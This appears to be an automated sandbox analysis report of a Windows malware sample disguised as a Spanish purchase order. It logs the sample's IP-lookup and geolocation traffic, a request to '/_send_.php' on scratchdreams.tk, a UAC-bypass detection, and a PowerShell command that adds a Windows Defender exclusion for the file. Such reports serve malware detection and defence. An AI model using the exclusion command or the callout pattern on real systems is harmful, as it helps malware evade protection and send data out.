Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49720	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:26.348359108 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:26.990111113 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 112d8954b1fb120751280849e4f64bb5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49722	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:28.139539003 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:29.798959970 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9823ce83812e1acd4aca617496e4c95a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49724	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:30.443523884 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:31.118014097 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 142a9b44a14d05882e00cfc9fa2d684b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:31.358717918 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 142a9b44a14d05882e00cfc9fa2d684b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49726	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:31.982728004 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:32.626929045 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e4c93917dbc45ca4a3bdcdf0a768b2c2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49715	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:17 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-27 10:20:18 UTC	697	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8Ti1snpmcp8Sk%2FrHWNTsd%2FsWo2QBQIvpsC3p0xkQ9pke3HPRVDpGD5aPQQNjFkHGbv1lENMzpPl6vny4iG8LmOLWZ1E8SF26fHCmnipmHuqs%2BQLIRgXbEsQqbNz7ni3n4qPIcf%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545845a34c328-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:18 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49716	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:20 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-27 10:20:20 UTC	700	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecmjOvQBeOhx2uKJAhp8hLGb1DVg6vbjt%2FT2byCwm0z90pCcujAkOrXkmxV7WRr%2FsDWeBIe2imwXMmQfJBs7cCMNLDFXZpuUwW9T1KixGwgYZejjBngvISnwnmrTbCDjoJNFh20H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a54591fe89c332-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:20 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49718	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:22 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-27 10:20:22 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgZe0JI4OolE%2BMYzMCN3WZIyl2463lELYWFogmvEpinazU9w6qBE45rEa%2BkDWUOuL0d%2B6RmReKWz1BdTkJTZ%2Bo1hkZWdM0%2BrnsKMLXyNqI7I4S5zNsPVN%2B0r7GOJZDWWUWOhdLib"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545a03aed0f5d-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:22 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49721	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:27 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-27 10:20:28 UTC	705	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5C1vXGnvXjlR8xfnNfDycBWo%2FEnuu4u7Z8YX3GdJGU7QDn7ZIoMZP0oM2yXiDOyf8g%2F7GXSzWVv9U8XyMa28nVClByw94qRRGqUE82UQYIvyuNWj2O%2FxcPA%2FhlISnPD1amAGou6A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545c37c4e4288-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:28 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49723	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:30 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-27 10:20:30 UTC	707	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JC7kFSCcSTYM%2BqWdtAqHG8wh%2BlJUoCRl18BSWo%2F7e6sbHW4pZAUnCyPK3IWvNF3CEdxEx0Wzi%2F8UQpmivfpI5RbEQCAoEIKnTr63O6bvZOXPhYrbCxH5lHT%2B7kLOT8x681MuvSuM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545d1d80c0f97-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:30 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49725	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:31 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-27 10:20:31 UTC	701	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpXVlpzUDEcA3BUG7Lm2mSB5111EznMMNGBYDt4lG09gQrXWo2n6KVS5EhPR3zwyMkux2%2Bd0V5egoXYJoBbYZq3yeoVlB3CJ1PZGvBbWJfju5MJVw%2BX7FyBHNitbWOWpVQaymlBM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545db790e422d-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:31 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49727	188.114.96.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:33 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-27 10:20:33 UTC	701	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15 Last-Modified: Mon, 27 May 2024 10:20:18 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5mO1nZuhhG%2BtoisohlluZ0aXNUcdF3y%2Fgg70nrzcFQ1Dj15OBOvJgUGFgadVNywAdG4K7VJsu4kfJh9VGUC2MG9XnWzu5oQDRQBtRBcVs1qAI5wQ7Y3sDRihYwTqmgCNkwMRCaG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a545e37d260f65-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:20:33 UTC	341	IN	Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
2024-05-27 10:20:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.3	49728	188.114.97.3	443	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 10:20:33 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-05-27 10:21:12 UTC	743	IN	HTTP/1.1 522 Date: Mon, 27 May 2024 10:21:12 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D4nTcwdnjXReor2Eyo9zbTtKPEyDcj3Hm%2BTES2GNfCt%2B%2BekoToQmS%2FgHpaUiSwJfUua3C2Ug%2FsBGaEGY2tjLMaLjxEMNAPrtXTrVA8mXWW2L08cn7cBaz37%2BbtRrWRnzc%2B51"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 88a545e7eca74303-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 10:21:12 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	3
Start time:	06:19:53
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe"
Imagebase:	0x14f79fd0000
File size:	1'483'760 bytes
MD5 hash:	9AB5F38A68CE1F4821C6D5CA8704EEFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:19:53
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:20:01
Start date:	27/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe" -Force
Imagebase:	0x7ff6f70b0000
File size:	486'400 bytes
